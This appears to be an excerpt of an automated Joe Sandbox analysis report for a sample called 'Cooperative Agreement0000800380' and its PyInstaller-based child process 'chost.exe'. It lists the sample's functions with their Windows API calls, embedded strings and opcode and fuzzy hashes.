Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
Instruction ID: 88038414d57a756cd7fad5c0050c74a6e8d04d69e7cdc083c9acd98434601a7e
Opcode Fuzzy Hash: 223ceb5fedc6bf78071f8d1d71221cc314eeccb9612ab2cf4b16bda0937aed7a
Instruction Fuzzy Hash: 9C51E370A00B069FC324CF69D980926B7F5FF587103148A3EE89A97B90D335F959CB94

Function 0040E130 Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040E145
HeapAlloc.KERNEL32(02390000,00000000,0000000A), ref: 0040E169
HeapReAlloc.KERNEL32(02390000,00000000,00000000,0000000A), ref: 0040E18D
HeapFree.KERNEL32(02390000,00000000,00000000,?,?,0040506F,?,0041702E,00401095,00000000), ref: 0040E1C4

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
Instruction ID: 6002b1c3f5819bc59b30070f24097f674b8c445c60846b79d2129d941eb5fd7b
Opcode Fuzzy Hash: 360229d15a1fb6af201326cedd8d5f72cb5848c1c9ec4e5b388a4d503be7f4ab
Instruction Fuzzy Hash: BA21F774604209EFDB14CF94D884FAAB7BAEB48354F108569F9099F390D735EA81CF94

Function 0040D498 Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D4E3
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E

Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
Instruction ID: 44ceb6562d1eb3065d03cece85d0244f92a2e0345c3169311120ea74ede9abb0
Opcode Fuzzy Hash: 762af24c506bf6e2b9559650e0095779b3b7acce71c4fd081469871384e8466f
Instruction Fuzzy Hash: 0A113D72604600AFC3208FA8DC40E56B7F9FB48325B14892EE896E36A1C734F804CF65

Function 0040D6DD Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8

Function 00409ECF Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182

Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

Analysis Process: chost.exePID: 4336, Parent PID: 3852COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	26

Executed Functions

Function 00007FF694368BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368C46

Part of subcall function 00007FF69437A4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69437A500

Part of subcall function 00007FF69437878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943787F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368CD6
CreateProcessW.KERNELBASE ref: 00007FF694368D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368D18

Part of subcall function 00007FF694362C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
Part of subcall function 00007FF694362C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
Part of subcall function 00007FF694362C50: MessageBoxW.USER32 ref: 00007FF694362D99

RegisterClassW.USER32 ref: 00007FF694368D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368D7B
CreateWindowExW.USER32 ref: 00007FF694368DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E05
PeekMessageW.USER32 ref: 00007FF694368E29
TranslateMessage.USER32 ref: 00007FF694368E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E41
PeekMessageW.USER32 ref: 00007FF694368E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694368FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF694369009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF694369012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF694363F7F), ref: 00007FF69436901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF694368D44
Failed to create child process!, xrefs: 00007FF694368D20
PyInstaller Onefile Hidden Window, xrefs: 00007FF694368D85
CreateProcessW, xrefs: 00007FF694368D27

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 2f78c17e8f6663816fc82164a7c7165028fca91e9fed9c9ce818c0f85e2fa460
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 12D17231A09A8386E7208F36E8952AD7760FF84B58F508279EA5DC7BA9DF3CD145C700

Function 00007FF694361000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF694363D35
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF694363A17, 00007FF694363A2F, 00007FF694363A9B
MEI, xrefs: 00007FF694363933
bye-runtime-tmpdir, xrefs: 00007FF694363B68
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF694363A0B, 00007FF694363CD4, 00007FF694363F6B
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF694363C61
VCRUNTIME140.dll, xrefs: 00007FF694363DB1
Failed to start splash screen!, xrefs: 00007FF694363ED4
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF694363EA6
Failed to remove temporary directory: %s, xrefs: 00007FF694363FC3
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6943639DE
pkg, xrefs: 00007FF6943639BE
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF694363BE8
pyi-python-flag, xrefs: 00007FF694363AD6
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF694363EBB
pyi-contents-directory, xrefs: 00007FF694363B8D
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF694363B32
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF694363D12
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF694363882, 00007FF6943638AF
Failed to load splash screen resources!, xrefs: 00007FF694363E85
Could not create temporary directory!, xrefs: 00007FF694363CBF
_PYI_ARCHIVE_FILE, xrefs: 00007FF6943638D2, 00007FF6943639FF
pyi-disable-windowed-traceback, xrefs: 00007FF694363BB2
_PYI_SPLASH_IPC, xrefs: 00007FF694363A23, 00007FF694363EF5
Py_GIL_DISABLED, xrefs: 00007FF694363AF4
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF694363E0A
Failed to convert DLL search path!, xrefs: 00007FF694363DDC
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF694363971

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: b3b5a56992daf9903ed9efec52e2e31294b1e992dc7436ca3323256ab31d685a
Instruction ID: 6d5ec9cbab3b320319b505cf61f02d885338274f5c20f9d9196418b22e6e0cf8
Opcode Fuzzy Hash: b3b5a56992daf9903ed9efec52e2e31294b1e992dc7436ca3323256ab31d685a
Instruction Fuzzy Hash: 11326C21A0C68791FA399B3294D62B976A1EF45784F84C0BEDA5DC36D6EF2CE564C300

Function 00007FF6943869D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF694386708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694386749
Part of subcall function 00007FF694386708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943867C7
Part of subcall function 00007FF694386708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694386818

CreateFileW.KERNELBASE ref: 00007FF694386ADA
CreateFileW.KERNEL32 ref: 00007FF694386B2A
GetLastError.KERNEL32 ref: 00007FF694386B5A
GetFileType.KERNELBASE ref: 00007FF694386B6F
GetLastError.KERNEL32 ref: 00007FF694386B79
CloseHandle.KERNEL32 ref: 00007FF694386BAC
CloseHandle.KERNEL32 ref: 00007FF694386D0F
CreateFileW.KERNEL32 ref: 00007FF694386D44
GetLastError.KERNEL32 ref: 00007FF694386D53

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 163e34ad10565bb3fe615f7e3a34a4ef17550527bb3377863564f117c90b8a52
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 80C1A236B28A4285EB20CFB6C4906AC7771F749BA8B119269DE2ED77D4CF38E455C300

Function 00007FF6943683B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436841B
RemoveDirectoryW.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF69436849E
DeleteFileW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684BD
FindNextFileW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684CB
FindClose.KERNEL32(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684DC
RemoveDirectoryW.KERNELBASE(?,00007FF694368B09,00007FF694363FA5), ref: 00007FF6943684E5

Strings

%s\*, xrefs: 00007FF6943683E2

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: f54adb1723f03b9f80fca2c002b245018af0083a498a69ff525712df6ff72109
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 9341B221A0D94381EA359B36E4C52B97360FB98758F90837AE99DC36D8DF3CD54AC700

Function 00007FF6943692F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF694369323
FindClose.KERNELBASE ref: 00007FF694369332

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 2e410cf13851aeba81fe7b4c3396e602905b6641dc6c9ffad5377d03b7e6117a
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 6DF04432A1864286F7708F76B4D976A7350EB84764F148279DAAD866D4EF3CD059CB00

Function 00007FF694380938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: 6fc1c0461378264d24db912c73872cf31cdc2197647f0bb5e75080b7222b2bdd
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: ED02B121A1D64690FE75AB33A5C1279A6A0EF45BA4F46C6BCED9DC63D2DE3CE411C300

Function 00007FF694361950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF694367F80: _fread_nolock.LIBCMT ref: 00007FF69436802A

_fread_nolock.LIBCMT ref: 00007FF694361A1B

Part of subcall function 00007FF694362910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E

Strings

fseek, xrefs: 00007FF6943619F5
Could not allocate memory for archive structure!, xrefs: 00007FF694361A61
Error on file., xrefs: 00007FF694361B8D
fread, xrefs: 00007FF694361A32, 00007FF694361B5C
calloc, xrefs: 00007FF694361A68
Could not read full TOC!, xrefs: 00007FF694361B55
MEI, xrefs: 00007FF694361991
Failed to seek to cookie position!, xrefs: 00007FF6943619EE
Failed to read cookie!, xrefs: 00007FF694361A2B
malloc, xrefs: 00007FF694361B22
Could not allocate buffer for TOC!, xrefs: 00007FF694361B1B

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: d522766856f946b06e70a868bf79752b85045892f8132ee412cafe079733bd22
Instruction ID: ec4b37d6c3ea0c03a9ced62c6e4a9f40e4ed2a7e83b8c715eb7a5da5b5a35b35
Opcode Fuzzy Hash: d522766856f946b06e70a868bf79752b85045892f8132ee412cafe079733bd22
Instruction Fuzzy Hash: 5D815B71A0CA8786EB709B36D0C62AD73A0EB48784F44C4B9E98DC7796DE3CE545CB40

Function 00007FF694361600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to create symbolic link %s!, xrefs: 00007FF694361622
fseek, xrefs: 00007FF6943616E1
Failed to extract %s: failed to open target file!, xrefs: 00007FF69436165C
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6943617CA
fread, xrefs: 00007FF6943617E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6943616DA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6943616A2
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6943617DF
fopen, xrefs: 00007FF694361663
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF694361742
malloc, xrefs: 00007FF694361749
fwrite, xrefs: 00007FF6943617D1

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

